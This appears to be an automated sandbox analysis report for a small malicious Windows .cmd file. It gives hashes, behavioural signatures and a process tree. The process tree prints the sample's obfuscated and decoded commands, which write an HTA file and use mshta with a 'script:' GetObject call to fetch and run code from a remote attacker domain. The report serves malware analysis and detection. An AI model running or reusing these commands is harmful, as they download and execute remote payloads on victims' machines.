Analysis
-
max time kernel
117s -
max time network
123s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
14-01-2022 07:00
Static task
static1
Behavioral task
behavioral1
Sample
536749.742.67513.78924_208.69621.4895824ã.cmd
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
536749.742.67513.78924_208.69621.4895824ã.cmd
Resource
win10-en-20211208
General
-
Target
536749.742.67513.78924_208.69621.4895824ã.cmd
-
Size
344B
-
MD5
19461ec95d2ed8da4cc2c4d9550aa125
-
SHA1
16a95e645237cfcf43e1ac67608783513e7dbfe3
-
SHA256
758416f5eaeb77570a9529e928cf21a38e803664412a198452719a8b9e994d19
-
SHA512
4e4d8e9fe6969546c188f02c28525bcaf589801c72054e2e116d05189e6004283a395110717b8936d520ebedc4e9b3b49bc6327d395689c186e695942a03adbe
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 5 1036 mshta.exe 7 1036 mshta.exe 9 1036 mshta.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.execmd.execmd.exedescription pid process target process PID 760 wrote to memory of 380 760 cmd.exe cmd.exe PID 760 wrote to memory of 380 760 cmd.exe cmd.exe PID 760 wrote to memory of 380 760 cmd.exe cmd.exe PID 380 wrote to memory of 268 380 cmd.exe cmd.exe PID 380 wrote to memory of 268 380 cmd.exe cmd.exe PID 380 wrote to memory of 268 380 cmd.exe cmd.exe PID 380 wrote to memory of 1488 380 cmd.exe cmd.exe PID 380 wrote to memory of 1488 380 cmd.exe cmd.exe PID 380 wrote to memory of 1488 380 cmd.exe cmd.exe PID 1488 wrote to memory of 772 1488 cmd.exe cmd.exe PID 1488 wrote to memory of 772 1488 cmd.exe cmd.exe PID 1488 wrote to memory of 772 1488 cmd.exe cmd.exe PID 772 wrote to memory of 1036 772 cmd.exe mshta.exe PID 772 wrote to memory of 1036 772 cmd.exe mshta.exe PID 772 wrote to memory of 1036 772 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\536749.742.67513.78924_208.69621.4895824ã.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /V/D/c "seT sKk=script&&seT px=mshta&&SEt AJKP=C:\Users\Public\Videos\^dOW&&SEt GSEM=^<!sKk!^>try{vfYYar c='!sKk!:';d='hfYYTtP:';GfYYetObjfYYect(c+d+'&&sET 9IF=BOTKRBOTKRa9eikr.5wyck43a9uxnu7e.cfdBOTKR?1BOTKR');}catch(e){}close();^</!sKk!^>&&sEt/^p JGDH="!GSEM:fYY=!!9IF:BOTKR=/!"<nul > !AJKP!.Hta|start /MIN CMD /c !px! !AJKP!.HtA "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt/p JGDH="<script>try{var c='script:';d='hTtP:';GetObject(c+d+'//a9eikr.5wyck43a9uxnu7e.cfd/?1/');}catch(e){}close();</script>" 0<nul 1>C:\Users\Public\Videos\dOW.Hta"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" start /MIN CMD /c mshta C:\Users\Public\Videos\dOW.HtA "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCMD /c mshta C:\Users\Public\Videos\dOW.HtA4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta C:\Users\Public\Videos\dOW.HtA5⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Videos\dOW.HtAMD5
4493b5e3f684c33ba8ee862f2fdb9944
SHA1e489710719416946503438f5675da901b8ee0dd8
SHA256f1c703ab466011aaf49c4f2284a0a0d9c85f53095369022648d32692271ede2a
SHA5123a8b5a970621eea4bab132b7ed85394d90295a93c3c834386ee3c27c6fde3c8128e08d182f7ab84759822f785fa32dd4a1b3b2e65162271deb4183b48887969a
-
memory/268-56-0x0000000000000000-mapping.dmp
-
memory/380-55-0x0000000000000000-mapping.dmp
-
memory/772-58-0x0000000000000000-mapping.dmp
-
memory/1036-59-0x0000000000000000-mapping.dmp
-
memory/1488-57-0x0000000000000000-mapping.dmp